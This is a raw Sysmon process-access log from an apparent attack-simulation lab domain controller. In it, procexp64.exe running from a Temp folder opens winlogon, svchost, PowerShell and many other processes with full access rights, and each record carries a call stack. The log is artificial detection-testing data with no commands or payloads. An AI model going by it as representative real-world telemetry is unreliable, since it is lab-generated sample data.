15:16:58.798{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792066Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.798{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792065Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.798{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792064Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.798{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792063Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.798{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792062Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.798{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792061Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.798{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792060Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792059Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792058Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792057Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792056Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792055Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792054Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792053Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792052Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792051Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792050Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792049Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792048Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792047Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792046Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792045Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792044Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792043Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792042Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792041Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792040Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792039Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792038Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792037Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792036Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792035Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792034Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792033Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 